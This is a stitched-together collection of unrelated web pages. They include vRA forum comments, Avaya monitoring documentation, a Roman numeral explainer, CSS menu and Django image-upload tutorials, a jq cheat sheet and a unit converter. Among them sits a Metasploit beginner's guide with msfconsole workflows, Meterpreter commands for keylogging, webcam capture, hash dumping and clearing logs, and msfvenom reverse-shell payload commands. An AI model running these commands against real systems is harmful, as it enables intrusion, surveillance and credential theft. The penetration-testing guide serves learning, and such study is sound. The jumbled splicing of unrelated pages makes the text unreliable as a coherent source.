Bug #34613 SQL mode missing in mysql.proc.sql_mode
Submitted: 15 Feb 2008 22:56 Modified: 15 Feb 2008 23:30
Reporter: Markus Popp Email Updates:
Status: Duplicate Impact on me:
None
Category:MySQL Server Severity:S3 (Non-critical)
Version:5.1.23 (others?) OS:Any
Assigned to: CPU Architecture:Any
[15 Feb 2008 22:56] Markus Popp
Description:
The SQL mode NO_ENGINE_SUBSTITUTION is missing in the field sql_mode of the mysql.proc table:
mysql> show create table proc\G
*************************** 1. row ***************************
Table: proc
Create Table: CREATE TABLE `proc` (
`db` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`name` char(64) NOT NULL DEFAULT '',
`type` enum('FUNCTION','PROCEDURE') NOT NULL,
`specific_name` char(64) NOT NULL DEFAULT '',
`language` enum('SQL') NOT NULL DEFAULT 'SQL',
`sql_data_access` enum('CONTAINS_SQL','NO_SQL','READS_SQL_DATA','MODIFIES_SQL_DATA') NOT NULL DEFAULT 'CONTAINS_SQL',
`is_deterministic` enum('YES','NO') NOT NULL DEFAULT 'NO',
`security_type` enum('INVOKER','DEFINER') NOT NULL DEFAULT 'DEFINER',
`param_list` blob NOT NULL,
`returns` longblob NOT NULL,
`body` longblob NOT NULL,
`definer` char(77) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
`modified` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`sql_mode` set('REAL_AS_FLOAT','PIPES_AS_CONCAT','ANSI_QUOTES','IGNORE_SPACE','NOT_USED','ONLY_FULL_GROUP_BY','NO_UNSIGNED_SUBTRACTION','NO_DIR_IN_CREATE','POSTGRESQL','ORACLE','MSSQL','DB2','MAXDB','NO_KEY_OPTIONS','NO_TABLE_OPTIONS','NO_FIELD_OPTIONS','MYSQL323','MYSQL40','ANSI','NO_AUTO_VALUE_ON_ZERO','NO_BACKSLASH_ESCAPES','STRICT_TRANS_TABLES','STRICT_ALL_TABLES','NO_ZERO_IN_DATE','NO_ZERO_DATE','INVALID_DATES','ERROR_FOR_DIVISION_BY_ZERO','TRADITIONAL','NO_AUTO_CREATE_USER','HIGH_NOT_PRECEDENCE') NOT NULL DEFAULT '',
`comment` char(64) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`character_set_client` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`collation_connection` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`db_collation` char(32) CHARACTER SET utf8 COLLATE utf8_bin DEFAULT NULL,
`body_utf8` longblob,
PRIMARY KEY (`db`,`name`,`type`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Stored Procedures'
1 row in set (0.01 sec)
It's missing in share/mysql_fix_privilege_tables.sql as well:
...
CREATE TABLE IF NOT EXISTS proc (db char(64) collate utf8_bin DEFAULT '' NOT NULL, name char(64) DEFAULT '' NOT NULL, type enum('FUNCTION','PROCEDURE') NOT NULL, specific_name char(64) DEFAULT '' NOT NULL, language enum('SQL') DEFAULT 'SQL' NOT NULL, sql_data_access enum( 'CONTAINS_SQL', 'NO_SQL', 'READS_SQL_DATA', 'MODIFIES_SQL_DATA') DEFAULT 'CONTAINS_SQL' NOT NULL, is_deterministic enum('YES','NO') DEFAULT 'NO' NOT NULL, security_type enum('INVOKER','DEFINER') DEFAULT 'DEFINER' NOT NULL, param_list blob NOT NULL, returns longblob DEFAULT '' NOT NULL, body longblob NOT NULL, definer char(77) collate utf8_bin DEFAULT '' NOT NULL, created timestamp, modified timestamp, sql_mode set( 'REAL_AS_FLOAT', 'PIPES_AS_CONCAT', 'ANSI_QUOTES', 'IGNORE_SPACE', 'NOT_USED', 'ONLY_FULL_GROUP_BY', 'NO_UNSIGNED_SUBTRACTION', 'NO_DIR_IN_CREATE', 'POSTGRESQL', 'ORACLE', 'MSSQL', 'DB2', 'MAXDB', 'NO_KEY_OPTIONS', 'NO_TABLE_OPTIONS', 'NO_FIELD_OPTIONS', 'MYSQL323', 'MYSQL40', 'ANSI', 'NO_AUTO_VALUE_ON_ZERO', 'NO_BACKSLASH_ESCAPES', 'STRICT_TRANS_TABLES', 'STRICT_ALL_TABLES', 'NO_ZERO_IN_DATE', 'NO_ZERO_DATE', 'INVALID_DATES', 'ERROR_FOR_DIVISION_BY_ZERO', 'TRADITIONAL', 'NO_AUTO_CREATE_USER', 'HIGH_NOT_PRECEDENCE') DEFAULT '' NOT NULL, comment char(64) collate utf8_bin DEFAULT '' NOT NULL, character_set_client char(32) collate utf8_bin, collation_connection char(32) collate utf8_bin, db_collation char(32) collate utf8_bin, body_utf8 longblob, PRIMARY KEY (db,name,type)) engine=MyISAM character set utf8 comment='Stored Procedures';
...
How to repeat:
On a fresh installation of MySQL 5.1.23, run the command SHOW CREATE TABLE mysql.proc.
Here's an example where this problem shows up:
mysql> SELECT @@sql_mode;
+----------------------------------------------------------------+
| @@sql_mode |
+----------------------------------------------------------------+
| STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION |
+----------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> CREATE FUNCTION fn_test(xx INT(4)) RETURNS INT(4) RETURN xx;
ERROR 1607 (HY000): Cannot create stored routine `fn_test`. Check warnings
mysql> SHOW WARNINGS;
+---------+------+--------------------------------------------------------+
| Level | Code | Message |
+---------+------+--------------------------------------------------------+
| Warning | 1265 | Data truncated for column 'sql_mode' at row 1 |
| Error | 1607 | Cannot create stored routine `fn_test`. Check warnings |
+---------+------+--------------------------------------------------------+
2 rows in set (0.00 sec)
mysql> SET @@sql_mode := '';
Query OK, 0 rows affected (0.00 sec)
mysql> CREATE FUNCTION fn_test(xx INT(4)) RETURNS INT(4) RETURN xx;
Query OK, 0 rows affected (0.00 sec)
mysql> SELECT fn_test(5);
+------------+
| fn_test(5) |
+------------+
| 5 |
+------------+
1 row in set (0.00 sec)
Suggested fix:
Add NO_ENGINE_SUBSTITUTION as one of values in the SET list.
[15 Feb 2008 23:30] Davi Arnaut
This is a duplicate of Bug#32633. Fixed in 5.1.24 (coming soon).
|
__label__pos
| 0.932429 |
Wednesday, November 12, 2008
Public Methods Should be Like Stories
I believe that most of the developers try to write code to be readable as much as possible. I will try to explain how I try to achieve this. From my point of view one of the most important things is to write public methods as stories. This means when somebody is reading your public method its implementation should tell with the sentence like methods what it tries to achieve. This way one can concentrate on the business logic that the method tries to achieve and not how that is achieved.
So I try to follow few short rules:
• Instead of code within public method call number of private methods
• Avoid loops
• Try to minimize if statements
• If private method is hard to read apply this rules to private method
Following this rules your public methods are easy to understand. It is easier to test if you are doing black-box testing. What may happen to your code is that you will have number of private methods if you implement mentioned rules also on private methods. But I don't consider this to be bad because in that case even private methods are easy to understand so if one should change your code it will be easier.
As opinion is easier to understand through example, I will show one method from my http://www.flexiblefeeds.com site.
Although example is in groovy I believe it will be easily understandable for all developers. Currently method looks like this:
def currentUserVote(Long articleId, boolean upVoting) {
boolean canVote = canCurrentUserVote(articleId)
if (!canVote) {
return
}
vote(articleId, upVoting)
registerVoting(articleId)
}
I believe that is is easy to understand what the method does from the code itself. But to be sure, first it is checked if current user can vote. If user cannot vote method returns. If user can vote voting is done and then voting is registered.
Now let us see how this method can look like if the code would be embedded into this public method.
def currentUserVote(Long articleId, boolean upVoting) {
// decide if user can vote
if (!loggedInUserIsAdministrator()) {
return
}
// logged in user can vote if he didn't voted
if (userIsLoggedIn()) {
return !voted(loggedInUser().id, articleId)
}
// not logged in user can vote if he didn't voted and data is stored in session
if(votedInSession(articleId)) {
return
}
// perform voting
try {
String sql
if (upVoting) {
sql = "SQL_FOR_UP_VOTING"
} else {
sql = "SQL_FOR_DOWN_VOTING"
}
Article.executeUpdate(sql, [id:articleId])
} catch (Exception ex) {
log.error("Failed to vote up for article ${articleId}", ex)
throw ex;
}
// register voting
if (loggedInUser()) {
def a = Article.get(articleId)
try {
ArticleVoting voting = new ArticleVoting(user:loggedInUser(), article:a)
voting.save(flush:true)
} catch (Exception ex) {
log.error(ex)
throw ex;
}
} else {
if (!session().votedIds) {
def votedIds = [] as Set
session().votedIds = votedIds
}
session().votedIds.add(articleId)
}
}
Having look at this method you can notice it is possible to understand what is method doing. But beside understanding what is method doing you are reading code. It means you are doing two things at the same time. Trying to understand business logic and trying to understand how this business logic is achieved.
Therefore in all cases I would recommend to refactor such code and to extract parts of the public methods into private methods.
1 comment:
Marcos Silva Pereira said...
You just give me an idea to my next coding dojo: something like (un|de)refactoring.
Kind Regards
|
__label__pos
| 0.998366 |
Rayrun
← Back to Discord Forum
why does running case switch between the two monitors to open the page?
optional518posted in #help-playwright
Open in Discord
When a computer is connected to two monitors, why does running case switch between the two monitors to open the page?
Is it possible to fix a certain monitor to open the page under test?
This thread is trying to answer question "Why does the browser switch between two monitors when opening a page with Playwright, and can a specific monitor be set to open the page?"
6 replies
my computer OS is macos。 M3 pro MBP
Playwright does not control where to open it
@skorp32: So which browser is opened is random behavior?
So which browser is opened is random behavior?
No, it's not random behavior. The Playwright browser behavior is determined by the configuration in the playwright.config.ts file
@samsuthen: But I don't have any configurations for which browser to open
But I don't have any configurations for which browser to open
refactoreric
Hi @optional518 , as far as I understand, you want to control /on which display/ the browser will open.
Which Playwright browser(s) are you using?
What is the current behavior? Does the same browser (Chromium) open on a different display each time? Or do different browsers (Chromium vs Firefox vs Webkit) open on a different display?
I don't think Playwright has any options to control this behavior. I expect this to be browser or operating system behavior. On Mac OS, be sure to check/adjust what is your Main display. https://www.eizoglobal.com/support/compatibility/monitor/multimonitor/macos-monterey/
TwitterGitHubLinkedIn
AboutQuestionsDiscord ForumBrowser ExtensionTagsQA Jobs
Rayrun is a community for QA engineers. I am constantly looking for new ways to add value to people learning Playwright and other browser automation frameworks. If you have feedback, email [email protected].
|
__label__pos
| 0.999842 |
I need a program that validates the value a user enters into a TextBox control to ensure that the entry is a valid telephone number.
The application should accept a maximum of 12 characters. When the user clicks a button, the program should determine if the entry is of the form 999-999-9999, where the character 9 represents any number.
If the entry is determined to be a telephone number, display an appropriate message, along with the separate substrings that compose the telephone number without the dashes. If the entry is not a telephone number, then display a message as to the reason why the entry is not a valid telephone number, clear the TextBox control and set focus to the TextBox control. Use String class methods to solve the problem.
haulottekAsked:
Who is Participating?
I wear a lot of hats...
"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.
Mike TomlinsonMiddle School Assistant TeacherCommented:
Hmmm....we can't do your homework here on EE. We can help you with a specific problem in your code though.
So, get to work!
Cheers
0
haulottekAuthor Commented:
You are right I am working in it
0
dancebertCommented:
>So, get to work!
Or drop the class. Being either unable or unmotivated to do your programming homework should be a huge red flag that you don't have what it takes to build systems for a living.
0
Ultimate Tool Kit for Technology Solution Provider
Broken down into practical pointers and step-by-step instructions, the IT Service Excellence Tool Kit delivers expert advice for technology solution providers. Get your free copy now.
pg_indiaCommented:
what u can do is to make a masked box with format as ###-###-####
set maxlength to 12 and then in key press check for the ascii value should be between 48 to 57..
also if error is there then u cnd do text1.text = ""
text1.setfocus
or whatever u want to do
if any problem do report...
0
haulottekAuthor Commented:
Lay off! I DO not need any help. Thanks
0
brother7Commented:
Tried and tested by me :)
Create a form with textbox txtInput and button cmdValidate.
--- CODE START ---
Private Sub cmdValidate_Click()
Dim areaCode, prefix, suffix As String
Dim isValid As Boolean
' assume a valid telephone number, try to invalidate it
isValid = True
' get the strings where numbers should be
areaCode = Left$(txtInput.Text, 3)
prefix = Mid$(txtInput.Text, 5, 3)
suffix = Right$(txtInput.Text, 4)
' check for valid length
If Len(txtInput.Text) <> 12 Then isValid = False
' check for numeric portions of telephone number
If Not IsNumeric(areaCode) Then isValid = False
If Not IsNumeric(prefix) Then isValid = False
If Not IsNumeric(suffix) Then isValid = False
' check that hyphens delimit the telephone number
If Mid$(txtInput.Text, 4, 1) <> "-" Or Mid$(txtInput.Text, 8, 1) <> "-" Then isValid = False
' tricky part... check that first and last characters of numeric parts aren't signs!
If Left$(areaCode, 1) = "+" Or Left$(areaCode, 1) = "-" Then isValid = False
If Right$(areaCode, 1) = "+" Or Right$(areaCode, 1) = "-" Then isValid = False
If Left$(prefix, 1) = "-" Or Left$(prefix, 1) = "-" Then isValid = False
If Right$(prefix, 1) = "-" Or Right$(prefix, 1) = "-" Then isValid = False
If Left$(suffix, 1) = "-" Or Left$(suffix, 1) = "-" Then isValid = False
If Right$(suffix, 1) = "-" Or Right$(suffix, 1) = "-" Then isValid = False
If isValid Then
returnValue = MsgBox("This is a valid telephone number." & vbCrLf & vbCrLf & _
"Area Code = " & areaCode & vbCrLf & _
"Prefix = " & prefix & vbCrLf & _
"Suffix = " & suffix, vbOKOnly, "Validation Result")
Else
returnValue = MsgBox("This is NOT a valid telephone number.", vbOKOnly, "Validation Result")
End If
End Sub
--- CODE END ---
0
brother7Commented:
New and improved version!
I forgot to give explanation why telephone number is invalid. This version also correctly clears the textbox and sets the focus.
--- CODE START ---
Private Sub cmdValidate_Click()
Dim areaCode, prefix, suffix, errorMsg As String
Dim isValid As Boolean
' assume a valid telephone number, try to invalidate it
isValid = True
' get the strings where numbers should be
areaCode = Left$(txtInput.Text, 3)
prefix = Mid$(txtInput.Text, 5, 3)
suffix = Right$(txtInput.Text, 4)
' check for numeric portions of telephone number
If Not IsNumeric(areaCode) Then
isValid = False
errorMsg = "Area Code " & areaCode & " is not numeric."
End If
If Not IsNumeric(prefix) Then
isValid = False
errorMsg = "Prefix " & prefix & " is not numeric."
End If
If Not IsNumeric(suffix) Then
isValid = False
errorMsg = "Suffix " & suffix & " is not numeric."
End If
' tricky part... check that first and last characters of numeric parts aren't signs!
If Left$(areaCode, 1) = "+" Or Left$(areaCode, 1) = "-" Or _
Right$(areaCode, 1) = "+" Or Right$(areaCode, 1) = "-" Or _
Left$(prefix, 1) = "-" Or Left$(prefix, 1) = "-" Or _
Right$(prefix, 1) = "-" Or Right$(prefix, 1) = "-" Or _
Left$(suffix, 1) = "-" Or Left$(suffix, 1) = "-" Or _
Right$(suffix, 1) = "-" Or Right$(suffix, 1) = "-" Then
isValid = False
errorMsg = "Why are you trying to trick me?" & vbCrLf & _
"A + or - sign is hidden in the telephone number."
End If
' check that hyphens delimit the telephone number
If Mid$(txtInput.Text, 4, 1) <> "-" Or Mid$(txtInput.Text, 8, 1) <> "-" Then
isValid = False
errorMsg = "Hyphen delimiters are missing or misplaced."
End If
' check for valid length
If Len(txtInput.Text) <> 12 Then
isValid = False
errorMsg = "Input string is incorrect length (" & Len(txtInput.Text) & ")"
End If
' display message box
If isValid Then
returnValue = MsgBox("This is a valid telephone number." & vbCrLf & vbCrLf & _
"Area Code = " & areaCode & vbCrLf & _
"Prefix = " & prefix & vbCrLf & _
"Suffix = " & suffix, vbOKOnly, "Validation Result")
Else
returnValue = MsgBox("This is NOT a valid telephone number." & vbCrLf & vbCrLf & _
errorMsg, vbOKOnly, "Validation Result")
End If
txtInput.Text = ""
txtInput.SetFocus
End Sub
--- CODE END ---
0
pg_indiaCommented:
But i feel my way is simpler and it saves from lot of coding...
comments plzzzz
add a component : masked textbox
AND THIS CODE...
Private Sub Command6_KeyPress(KeyAscii As Integer)
If KeyAscii < 48 Or KeyAscii > 57 Then
KeyAscii = 0
End If
End Sub
0
brother7Commented:
In the problem statement, it says "Use String class methods to solve the problem." I'm thinking that his teacher wants him to get familiar with Left$, Mid$ and Right$.
0
PashaModCommented:
PAQed - no points refunded (of 250)
PashaMod
Community Support Moderator
0
Experts Exchange Solution brought to you by
Your issues matter to us.
Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.
Start your 7-day free trial
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
Visual Basic Classic
From novice to tech pro — start learning today.
Question has a verified solution.
Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.
Have a better answer? Share it in a comment.
|
__label__pos
| 0.875697 |
Monthly Archives
March 2019
What is a Malware and Virus?
By | Uncategorized
Regardless of what you call it, most people know you don’t want a malware or a virus hanging around. Then why is it important to understand the difference between the two? One simple reason is you can protect your computer from a virus, but not be protected from a malware. Why? Because all viruses are malwares, but not all malwares are viruses. Allow me to explain.
What is a Malware
Malware, short for malicious software, is written by cyber criminals with the intention of gaining access or causing damage to a computer or network, often without you even knowing you’ve been compromise. This malicious software is written differently depending on the goal(s) of the perpetrator. For example, a malware appropriately named ransomware is written in a way that once your computer or network is infected you are locked out and unable to access your data until you pay a ransom. Another example is those annoying pop ups’ you get almost forcing you to click on that advertisement link, is a malware called adware. There are many other variations of malware including trojan horse, spyware, wiper, worm, botnet, keyloggers, rootkits, and fraudtools, written with different objectives.
What is a Virus
One of the most recognized names of all malwares is the virus made popular in the 80’s and 90’s. This malware is written with the intention of altering the way your computer operates and spreads itself across a network without the user’s involvement. Over the past few decades the virus has become less frequent compared to other malwares, but its name continues to be used synonymously with malwares. “My computer has a virus” often means your computer has a malware.
How to protect yourself
There are best practices such as security awareness training to avoid phishing, a “is this software safe?” search before downloading a program or app, keeping your software up to date, using strong passwords, backing up your computer, and using a firewall. One of the most reliable ways to protect your data is through the use of anti-malware and anti-virus software. Anti-virus software is about preventing viruses from being downloaded or opened on your computer or network. If a virus becomes active it’s difficult for the anti-virus software to detect its presence. Anti-malware on the other hand is designed to take malware, including a virus, out of an infected computer. Think of it as anti-virus is about prevention while anti-malware is about correction. That said, it is advised to use both for the best protection. If you are interested in learning more about the software available, check out PC Magazine’s “The Best Malware Removal and Protection Software for 2019” at https://www.pcmag.com/roundup/354226/the-best-malware-removal-and-protection-tools
While speaking with a friend Jason about malware vs. virus, he made a comparison to spiders. This helped me make the “all viruses are malwares, but not all malwares are viruses” statement easier to understand. Think of this, all Daddy Long Legs are spiders, but not all spiders are Daddy Long Legs.
Next up: What is a firewall?
Click here for our previous post, “What is XaaS?”
What is XaaS?
What is XaaS?
By | Uncategorized
Every industry has its terms and acronyms, information technology (IT) and telecommunications being no expectation. There is even a popular industry book “Newton’s Telecom Dictionary” now on its 31st edition with over 30,000 terms defined. The as-a-service (“aaS”) model, in the context of cloud computing, is a term that refers to a service(s) being made available over the Internet via the cloud. The “X” is a placeholder representing virtually anything and everything.
You can replace the X with just about any letter of the alphabet and you will likely find it is a service. I randomly picked the letter T which, as it turns out, is “testing”, who knew? The X can also represent services with more than one letter, such as: disaster recovery (DRaaS), business continuity (BCaaS), information technology (ITaaS), database (DBaaS), etc.
Perhaps the most popular “aaS” is SaaS, pronounced “sas” not S-A-A-S. Although the S can represent many services including search, security, and storage, it is more commonly recognized as Software-as-a-Service.This particular service has been made popular thanks to recognizable household services like Dropbox, LinkedIn, and Twitter and although debated Facebook. In business you hear names like: DocuSign, LinkedIn, Salesforce, Office 365, Zendesk, GoToMeeting, Workday, HubSpot & Intuit (QuickBooks, TurboTax, etc.) Beyond SaaS, some of the other common “aaS” include backup (BaaS), desktop (DaaS), infrastructure (IaaS), platform (PaaS), and unified communications (UCaaS).
The benefits of “aaS” are many including lower cost, speed of deployment, seamless upgrades, no infrastructure required and its accessibility from multiple devices (tablets, laptops, smartphones, etc.).
Next up: What is a malware and virus?
Click here for our previous post, “What is Mobile Device Management?”
|
__label__pos
| 0.647686 |
Form preview
Django comes with an optional “form preview” application that helps automate the following workflow:
“Display an HTML form, force a preview, then do something with the submission.”
To force a preview of a form submission, all you have to do is write a short Python class.
Overview
Given a django.forms.Form subclass that you define, this application takes care of the following workflow:
1. Displays the form as HTML on a Web page.
2. Validates the form data when it’s submitted via POST. a. If it’s valid, displays a preview page. b. If it’s not valid, redisplays the form with error messages.
3. When the “confirmation” form is submitted from the preview page, calls a hook that you define – a done() method that gets passed the valid data.
The framework enforces the required preview by passing a shared-secret hash to the preview page via hidden form fields. If somebody tweaks the form parameters on the preview page, the form submission will fail the hash-comparison test.
How to use FormPreview
1. Point Django at the default FormPreview templates. There are two ways to do this:
• Add 'django.contrib.formtools' to your INSTALLED_APPS setting. This will work if your TEMPLATE_LOADERS setting includes the app_directories template loader (which is the case by default). See the template loader docs for more.
• Otherwise, determine the full filesystem path to the django/contrib/formtools/templates directory, and add that directory to your TEMPLATE_DIRS setting.
2. Create a FormPreview subclass that overrides the done() method:
from django.contrib.formtools.preview import FormPreview
from myapp.models import SomeModel
class SomeModelFormPreview(FormPreview):
def done(self, request, cleaned_data):
# Do something with the cleaned_data, then redirect
# to a "success" page.
return HttpResponseRedirect('/form/success')
This method takes an HttpRequest object and a dictionary of the form data after it has been validated and cleaned. It should return an HttpResponseRedirect that is the end result of the form being submitted.
3. Change your URLconf to point to an instance of your FormPreview subclass:
from myapp.preview import SomeModelFormPreview
from myapp.forms import SomeModelForm
from django import forms
...and add the following line to the appropriate model in your URLconf:
(r'^post/$', SomeModelFormPreview(SomeModelForm)),
where SomeModelForm is a Form or ModelForm class for the model.
4. Run the Django server and visit /post/ in your browser.
FormPreview classes
class FormPreview
A FormPreview class is a simple Python class that represents the preview workflow. FormPreview classes must subclass django.contrib.formtools.preview.FormPreview and override the done() method. They can live anywhere in your codebase.
FormPreview templates
FormPreview.form_template
FormPreview.preview_template
By default, the form is rendered via the template formtools/form.html, and the preview page is rendered via the template formtools/preview.html. These values can be overridden for a particular form preview by setting preview_template and form_template attributes on the FormPreview subclass. See django/contrib/formtools/templates for the default templates.
Advanced FormPreview methods
FormPreview.process_preview()
Given a validated form, performs any extra processing before displaying the preview page, and saves any extra data in context.
By default, this method is empty. It is called after the form is validated, but before the context is modified with hash information and rendered.
Back to Top
|
__label__pos
| 0.756429 |
PHP面向对象编程:12.重载新的方法(parent::) - 库珀的技术分亨
PHP面向对象编程:12.重载新的方法(parent::)
作者:张小十 时间:2015-07-30 阅读:540
在学习PHP 这种语言中你会发现, PHP中的方法是不能重载的, 所谓的方法重载就是定义相同的方法名,通过“参数的个数“不同或“参数的类型“不 同,来访问我们的相同方法名的不同方法。但是因为PHP是弱类型的语言, 所以在方法的参数中本身就可以接收不同类型的数据,又因为PHP的方法可以接收不定个数的参数,所以通过传递不同个数的参数调用不相同方法名的不同方法也是不成立的。所以在PHP里面没有方法重载。不能重载也就是在你的项目中不能定义相同方法名的方法。另外,因为PHP没有名子空间的概念,在同一个页面和被包含的页面中不能定义相同名称的方法, 也不能定义和PHP给我提供的方法的方法重名,当然在同一个类中也不能定义相同名称的方法。
我们这里所指的重载新的方法所指的是什么呢?其实我们所说的重载新的方法就是子类覆盖父类的已有的方法,那为什么要这么做呢?父类的方法不是可以继承过 来直接用吗?但有一些情况是我们必须要覆盖的,比如说我们前面提到过的例子里面, “Person”这个人类里面有一个“说话”的方法,所有继承“Person”类的子类都是可以“说话”的, 我们“Student”类就是“Person”类的子类,所以“Student”的实例就可以“说话“了, 但是人类里面“说话”的方法里面说出的是“Person”类里面的属性, 而“Student”类对“Person”类进行了扩展,又扩展出了几个新的属性,如果使用继承过来的“say()”说话方法的话,只能说出从 “Person”类继承过来的那些属性,那么新扩展的那些属性使用这个继承过来的“say()”的方法就说不出来了,那有的人就问了,我在 “Student”这个子类中再定义一个新的方法用于说话,说出子类里面所有的属性不就行了吗?一定不要这么做, 从抽象的角度来讲, 一个“学生”不能有两种“说话”的方法,就算你定义了两个不同的说话的方法,可以实现你想要的功能,被继承过来的那个“说话“方法可能没有机会用到了,而 且是继承过来的你也删不掉。这个时候我们就要用到覆盖了。
虽然说在PHP里面不能定义同名的方法, 但是在父子关系的两个类中,我们可以在子类中定义和父类同名的方法,这样就把父类中继承过来的方法覆盖掉了。
<?
//定义一个"人"类做为父类
class Person
{
//下面是人的成员属性
var $name; //人的名子
var $sex; //人的性别
var $age; //人的年龄
//定义一个构造方法参数为属性姓名$name、性别$sex和年龄$age进行赋值
function __construct($name, $sex, $age) {
$this->name = $name;
$this->sex = $sex;
$this->age = $age;
}
//这个人可以说话的方法, 说出自己的属性
function say() {
echo "我的名子叫:" . $this->name . " 性别:" . $this->sex . " 我的年龄是:" . $this->age;
}
}
class Student extends Person
{
var $school; //学生所在学校的属性
//这个学生学习的方法
function study() {
echo "我的名子叫:" . $this->name . " 我正在" . $this->school . " 学习";
}
//这个学性可以说话的方法, 说出自己所有的属性,覆盖了父类的同名方法
function say() {
echo "我的名子叫:" . $this->name . " 性别:" . $this->sex . " 我的年龄是:" . $this->age . " 我在" . $this->school . "上学";
}
}
?>
上面的例子, 我们就在“Student”子类里覆盖了继承父类里面的”say()”的方法,通过覆盖我们就实现了对“方法”扩展。但是,像这样 做虽然解决了我们上面说的问题,但是在实际开发中,一个方法不可能就一条代码或是几条代码,比如说“Person”类里面的“say()”方法有里面有 100条代码,如果我们想对这个方法覆盖保留原有的功能外加上一点点功能,就要把原有的100条代码重写一次, 再加上扩展的几条代码,这还算是好的,而有的情况,父类中的方法是看不见原代码的,这个时候你怎么去重写原有的代码呢?我们也有解决的办法,就是在子类这 个方法中可以调用到父类中被覆盖的方法, 也就是把被覆盖的方法原有的功能拿过来再加上自己的一点功能,可以通过两种方法实现在子类的方法中调用父类被覆盖的方法:
一种是使用父类的“类名::“来调用父类中被覆盖的方法;
一种是使用“parent::”的方试来调用父类中被覆盖的方法;
class Student extends Person
{
var $school; //学生所在学校的属性
//这个学生学习的方法
function study() {
echo "我的名子叫:" . $this->name . " 我正在" . $this->school . "学习";
}
//这个学性可以说话的方法, 说出自己所有的属性,覆盖了父类的同名方法
function say() {
//使用父类的"类名::"来调用父类中被覆盖的方法;
// Person::say();
//或者使用"parent::"的方试来调用父类中被覆盖的方法;
parent::say();
//加上一点自己的功能
echo "我的年龄是:" . $this->age . " 我在" . $this->school . "上学";
}
}
现在用两种方式都可以访问到父类中被覆盖的方法,我们选那种方式最好呢?用户可能会发现自己写的代码访问了父类的变量和函数。如果子类非常精炼或者父类非 常专业化的时候尤其是这样。 不要用代码中父类文字上的名字,应该用特殊的名字 parent,它指的就是子类在 extends 声明中所指的父类的名字。这样做可以避免在多个地方使用父类的名字。如果继承树在实现的过程中要修改,只要简单地修改类中 extends 声明的部分。
同样,构造方法在子类中如果没有声明的话,也可以使用父类中的构造方法,如果子类中重新定义了一个构造方法也会覆盖掉父类中的构造方法,如果想使用新的构造方法为所有属性赋值也可以用同样的方式。
class Student extends Person
{
var $school; //学生所在学校的属性
function __construct($name, $sex, $age, $school) {
//使用父类中的方法为原有的属性赋值
parent::__construct($name, $sex, $age);
$this->school = $school;
}
//这个学生学习的方法
function study() {
echo "我的名子叫:" . $this->name . " 我正在" . $this->school . " 学习";
}
//这个人可以说话的方法, 说出自己的属性
function say() {
parent::say();
//加上一点自己的功能
echo "我的年龄是:" . $this->age . " 我在" . $this->school . "上学";
}
}
评 论
共有:条评论信息
我是有底线的
|
__label__pos
| 0.776478 |
MYTUTOR SUBJECT ANSWERS
558 views
Simple binomial: (1+0.5x)^4
Expand (1+0.5x), simplifying the coefficients.
1. Draw Pascal's triangle to find the coefficients
1
1 2 1
1 3 3 1
1 4 6 4 1
As you can see, each row starts and ends with 1. The numbers in between are worked out by adding the two numbers on top.
For this question, we will be using the 1 4 6 4 1 row because the expression is raised to the power of 4. This expansion will have 5 expressions.
2. For each term, both 1 and 0.5 are raised to powers 0 to 4, where the sum of the powers always adds up to 4. In addition, the power of x is increased from 0 to 4 as the term progress.
(1+0.5x)
1(1)4(0.5)0x04(1)3(0.5)1 x1 + 6(1)2(0.5)x24(1)1(0.5)3 x3+ 1(1)0(0.5)x4
First, we raising 1 to the power of 4, therefore 0.5 is raised to the power of 0. For the next term, the power of 1 decreased by 1 and the power of 0.5 increases by 1, so that the sum of the terms still equates to 4. This is done until we get 5 terms in total.
3. The expression can be simplified as followed:
= 1 + 4(1/2)x + 6(1/4)x+ 4(1/8)x3 + (1/16)x
= 1 + 2x + 3/2x+ 1/2x+ 1/16x4
Srikka S. 11 Plus Maths tutor, GCSE Maths tutor, A Level Maths tutor,...
11 months ago
Answered by Srikka, an A Level Maths tutor with MyTutor
Still stuck? Get one-to-one help from a personally interviewed subject specialist
337 SUBJECT SPECIALISTS
Roma V. A Level Maths tutor, 13 Plus Maths tutor, GCSE Maths tutor, ...
£26 /hr
Roma V.
Degree: Mathematics, Operational Research, Statistics and Economics (Bachelors) - Warwick University
Subjects offered:Maths, Further Mathematics + 1 more
Maths
Further Mathematics
Economics
“Top tutor from the renowned Russell university group, ready to help you improve your grades.”
£22 /hr
Praveenaa K.
Degree: Mathematics (Masters) - Bristol University
Subjects offered:Maths, Science+ 4 more
Maths
Science
Further Mathematics
English
Chemistry
-Personal Statements-
“Top tutor from the renowned Russell university group, ready to help you improve your grades.”
£30 /hr
Alex S.
Degree: Physics (Bachelors) - Oxford, St Peter's College University
Subjects offered:Maths, Physics+ 2 more
Maths
Physics
Further Mathematics
.PAT.
“Studying Physics at the University of Oxford. Looking to tutor maths and physics at all levels, be sure to send me a message if you have any questions!”
About the author
£20 /hr
Srikka S.
Degree: Electrical & Electronics Engineering (Masters) - Bristol University
Subjects offered:Maths, Physics+ 2 more
Maths
Physics
French
-Personal Statements-
“Top tutor from the renowned Russell university group, ready to help you improve your grades.”
MyTutor guarantee
You may also like...
Other A Level Maths questions
The curve y = 2x^3 - ax^2 + 8x + 2 passes through the point B where x=4. Given that B is a stationary point of the curve, find the value of the constant a.
